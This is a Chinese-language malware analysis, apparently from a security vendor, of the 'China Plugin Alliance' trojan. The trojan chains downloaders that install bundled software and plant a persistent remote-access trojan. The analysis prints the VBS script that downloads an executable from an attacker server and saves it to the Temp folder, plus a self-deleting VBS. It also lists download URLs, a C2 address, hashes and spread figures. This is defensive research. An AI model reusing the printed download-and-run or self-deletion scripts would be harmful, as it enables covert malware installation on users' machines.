中国插件联盟

摘要

  一款名叫”中国插件联盟”的木马最近又开始活跃了。该木马早期通过搜狐影音的下载模块程序启动该木马，最近发现的是通过系统的svchost.exe启动该木马。使人防不胜防，一不小心就中招了。

木马危害

该木马简单的看上去就是一个软件推广程序。可是其实不是那么简单，该木马程序不仅在用户电脑上安装很多很多的软件，还在用户电脑上释放一个远控木马。一旦中了远控木马，远控端的想给你电脑上装啥就给你装啥，平时有事没事瞅瞅你在干嘛，有事没事翻翻你的文件，有事没事帮你装一些软件等等等等，哎呀妈呀，想想都觉得好可怕。

让中招后的图直击你的双眼吧看看看看这都是啥(ps:开机后还会看大更多，这里就不一一截图~\(≧▽≦)/~啦啦啦)

木马流程

木马的流程简要概括一下就是通过vbs脚本，下载一个下载者、一个远控木马和大量安装包到本地。然后新下载的下载者继续下载安装包。远控木马通过一系列隐藏手法将自己放在用户不用一察觉的文件夹，同时操作注册表写入服务，使远控木马开机自启动。

木马行为分析

0x01  用vbs脚本

该脚本的就是将远程服务器上的svchost.exe程序重命名为putty.exe（一个下载者）文件

1: Set xPost=createObject("Microsoft.XMLHTTP") 

   2: xPost.Open "GET","http://183.xxx.80.93:3389/svchost.exe",0 

   3: xPost.Send() 

   4: set sGet=createObject("ADODB.Stream") 

   5: sGet.Mode=3 

   6: sGet.Type=1 

   7: sGet.Open() 

   8: sGet.Write xPost.ResponseBody 

   9: sGet.SaveToFile "C:\Windows\Temp\putty.exe",2

  10: Set xPost=createObject("Microsoft.XMLHTTP") 

  11: xPost.Open "GET","http://183.xxx.80.93:3377/svchost.exe",0 

  12: xPost.Send() 

  13: set sGet=createObject("ADODB.Stream") 

  14: sGet.Mode=3 

  15: sGet.Type=1 

  16: sGet.Open() 

  17: sGet.Write xPost.ResponseBody 

  18: sGet.SaveToFile "C:\Windows\Temp\putty.exe",2

0x02 putty.exe程序分析

1.读取远程服务器上的txt文档，进行批量下载批量下载

通过读取hxxp://txt.ichajianlianmeng.com:88/1001.txt页面的内容，然后进行下载

调用用InternetConnectA建立远程访问

通过httpOpenRequestA和HttpSendRequestA创建请求并发送请求到HTTP服务器

读取到远程服务器中的txt保存的内容

hxxp://down.ichajianlianmeng.com:888/sie.exe

hxxp://www.yczuowenwang.com/xp.exe

hxxp://cdn.yuu361.com/download/Fresh_20i5_052039fc.exe

hxxp://down.woka123.cn/qudao/lol/dmxyxhh_504.exe

hxxp://down.biomall.org.cn/meng/up/niutu410202.exe

hxxp://down.nvjay.com:6677/huajun/huajun_15-8.exe

hxxp://down.ichajianlianmeng.com:888/59801_6789_sd1.exe

hxxp://down.sushouspell.com/sushou/sw/-2208_1_ss.exe

hxxp://download.suxiazai.com/for_down/2013/install1552262.exe

通过InternetReadFile依次读取上面链接的内容到程序中

创建文件、写入数据、执行该程序

后面就循环读读取完链接中的内容并创建进程，第一轮下载就完毕了

中间会创建一个空的MD5文件，该文件只是用来做标记，如果再次运行这个下载者就不在进行下载了

0x03 sie.exe---下载者里的下载者

   嗷嗷啊，世界真是奇妙，一层一层有一层，因为此下载者的功能和实现跟上面的是一样，所以这里就不再次写分析过程了，只是这次的下载者不会再释放出下载者了。

第二轮下载通过访问hxxp://txt.ichajianlianmeng.com:88/siedown.txt文件中的以下链接进行下载

   1: http://down.meituview.com/MTViewbuildmtview_116.exe

   2: #

   3: hxxp://down.shkbx.com/SC_rg0cfc_xt2005_1.exe

   4: #

   5: hxxp://down.shkbx.com/SC_rg0cfc_xt2000_1.exe

   6: #

   7: hxxp://down.sou2v.com/UserFiles/install_107_1a.exe

   8: #

   9: hxxp://down.sushouspell.com/sushou/sw/-2208_1_ss.exe

然后得到下面的文件

0x04 xx360.exe远控木马

通过乱序字符串拼接的方式获取到即将创建文件的路径

创建文件、访问hxxp://61.160.195.24:666/NetSyst81.dll并读取数据到内存中

将刚刚读取到的数据写入NetSys.dll文件中

读取NetSys.dll中的内容，并在内存在申请空间，解密刚刚获取到的NetSys.dll文件，解密后获得一个PE结构的文件(其实就会我们这个木马的本身的一个复制品，利用这样的放法来迷惑杀毒软件)

创建并执行Terms.EXE.exe文件

创建注册表和服务，达到隐藏和长期驻扎在用户电脑里而且开机自启动

对远控抓包分析（原来的远控木马已经不能连接上了，这里把自己的主机配置成该目标程序）

嗷嗷，这就是把自己的主机配置成目标后接受到的数据，一看就是zlib格式的，前面就是一个头，截取后面的拿去python脚本里跑一跑

用Python解密后，看到自己电脑的操作系统版本，以及用户名，还有上线时间了

   1: a = ‘b313640002154620310788598118c4d6e062606002d2c1a9456599c9a90a0189c9d90ac60c7407cc208211e8220510e3c00ac60686ff20b137f68c50150220820b44241695649416eb1a1a269ba6985b1a32182d3c68ac676ce4ee51c56070e68dc1a98d26e6dbaf31d88459e8991bda2904c71b1a19181b98321819189aea1a98e91a1a29181a5a9918321c5973e2fcf66bd75f329cdbb27dd1f96b0a0c0029dd29b0‘

   2: import codecs

   3: b = codecs.decode(a, ‘hex_codec‘)

   4: zlib.decompress(b, -8)

释放vbs文件，删除自身，使自己隐藏起来

   1: dim wsh

   2: On Error Resume Next

   3: set wsh=createObject("WScript.Shell")

   4: Set objFSO = CreateObject("Scripting.FileSystemObject")

   5: wscript.sleep 1000

   6: objFSO.DeleteFile("C:\Documents and Settings\Administrator\桌面\360.exe"), True

   7: createobject("scripting.filesystemobject").deletefile wscript.scriptfullname      

数据统计

0x01获取到的文件数量

已捕获到文件的MD值，软件包是大量的（该远程服务器上的数据包是在不断地更新的，所以获取到的安装包的量很大，下面只是一部分）

   1: e3198f710f307e16413cd7d599f971ebc

   2: e3198f710f307e16413cd7d599f971eb

   3: 1552ccfa8cef81056d5c23d167cafd19c

   4: 1552ccfa8cef81056d5c23d167cafd19

   5: bba33d5501a780c392e4da520506da25

   6: 6b08cdde7530efab0a9a5275ff4867b3

   7: abba9c49e181f27b4f387ab88c505646

   8: a22e31255f3092f4d1b429d76976ba0f

   9: 8268182d660f2d72c05ff3c2bec90f61

  10: 8910b238873a26f76854c102eab68673

  11: 2a011d1c0ad02a9acf5315ccb7657713

  12: e41c325df557e54ab95ff5dc81abfd8c

  13: 20d6852156af4db9cac546e666a436ff

  14: a22e31255f3092f4d1b429d76976ba0f

  15: e0126226ff5a65b283db12d02ccc5a1d

  16: 27c38edd7fd7c8c2eeddac457a407c0f

  17: 8fa79dd7f1ba8b047862a904c69d40da

  18: e94591e1dd94d0ea6fe2f03d9cdde05c

  19: 6d0678e31452aafd6aee2c4947b4ef48

  20: 6a5ab49d61623e22618e8b9c4904e85f

  21: 45529e071f7f5d5b05705a9e35c5ddab

  22: 5312719ecc909d4c47452eacc8452c73

  23: 5312719ecc909d4c47452eacc8452c73

0x02木马传播量

sie.exe（5312719ecc909d4c47452eacc8452c73）下载者   从2015-05-30到现在的查询量:6229088

xx360.exe(e94591e1dd94d0ea6fe2f03d9cdde05) 远控木马  从2015-06-06到现在的查询量:11792

Server.exe(6a5ab49d61623e22618e8b9c4904e85f)  远控木马   从2015-04-25到现在的查询量:324722

总结

通过分析我们可以看出，该木马不仅是一个流氓推广软件，而且是一个远控木马。给用户强制安装大量软件的同时侵犯了用户的隐私。如果用户在使用电脑的过程中，莫名其妙的出现大量的软件，就请及时用360扫描进行全盘杀毒

该文件被下载下来的时候就能被360安全卫士检测到